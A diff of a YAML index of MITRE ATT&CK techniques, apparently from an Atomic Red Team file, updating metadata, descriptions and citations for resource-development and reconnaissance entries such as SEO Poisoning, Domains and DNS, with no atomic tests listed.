+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -53809,11 +54469,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -53871,17 +54534,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -53889,7 +54553,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -53903,7 +54567,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -53936,11 +54600,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -53962,7 +54633,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -53980,47 +54651,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54029,21 +54663,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54083,7 +54753,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54102,15 +54772,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54118,19 +54786,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54164,55 +54832,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54237,7 +54914,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54253,8 +54930,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -54276,7 +54951,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54292,8 +54967,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -54321,7 +54994,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54337,33 +55010,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -54377,18 +55050,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -54409,7 +55093,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54425,39 +55109,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
